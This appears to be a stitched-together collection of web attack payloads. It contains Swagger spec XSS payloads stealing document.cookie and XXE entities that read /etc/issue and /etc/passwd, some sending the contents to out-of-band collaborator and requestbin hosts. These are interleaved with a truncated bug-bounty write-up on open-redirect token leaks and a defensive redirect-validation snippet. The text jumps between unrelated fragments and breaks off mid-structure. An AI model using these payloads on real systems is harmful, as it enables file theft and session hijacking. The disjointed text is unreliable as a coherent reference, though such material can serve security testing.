swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Example Title
  description: Click here for <a href="https://cobalt.io">Information</a>
<html>
<body>
<h1>The XMLHttpRequest Object</h1>
<button type="button" onclick="loadDoc()">Request data</button>
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://7emscc550ck73ff2k9amwlwuwl2bq0.burpcollaborator.net?%file;'>">
%p2;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://pingb.in/p/2ebe9045521fdb0eb23fb222ec64?%file;'>">
%p2;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://requestbin.net/r/r81iypr8?%file;'>">
%p2;
swagger: "2.0"
info:
  title: "Swagger Sample App"
  description: "Please to click Terms of service"
  termsOfService: "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"
  contact:
    name: "API Support"
    url: "java%0Ascript:%0Aalert(document.cookie);//"
    email: "javascript:%0Aalert(document.cookie)"
  version: "1.0.1"

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input on the client side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
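A server-side check for the redirect parameter from step 1, together with percent-encoding of the user-supplied code from step 3, as an added defensive example (not code from the original write-up); the allowed host example.com and the function names are assumptions:

```python
from urllib.parse import urlsplit, urlunsplit, quote

# Assumption: the application's own host(s); anything else is an off-site redirect.
ALLOWED_HOSTS = {"example.com"}

def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Reduce a user-supplied ?url= value to a same-site path, or fall back.

    Rejects foreign hosts, non-http(s) schemes such as javascript:, scheme-relative
    '//host' forms, userinfo tricks (https://example.com@other/) and backslash
    variants that browsers treat as slashes.
    """
    if not raw:
        return default
    candidate = raw.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() not in ("http", "https"):
            return default
        # .hostname is lower-cased and excludes userinfo and port.
        if (parts.hostname or "") not in ALLOWED_HOSTS:
            return default
    path = parts.path or "/"
    if not path.startswith("/") or path.startswith("//"):
        return default
    # Re-emit as a relative URL so the Location header can never leave the site.
    return urlunsplit(("", "", path, parts.query, parts.fragment))

def verify_path(code: str) -> str:
    """Build the /verify/<code> path with the code percent-encoded, '/' included.

    Without encoding, a code containing '../' or '?' would rewrite the request
    path or query instead of being carried as data.
    """
    return "/verify/" + quote(code, safe="")
```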
<title>test</title>
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<channel>
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
<title>Data Skeptic</title>
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate>
<generator>Libsyn WebEngine 2.0</generator>
<link>http://dataskeptic.com</link>
<language>en</language>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>&xxe;</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>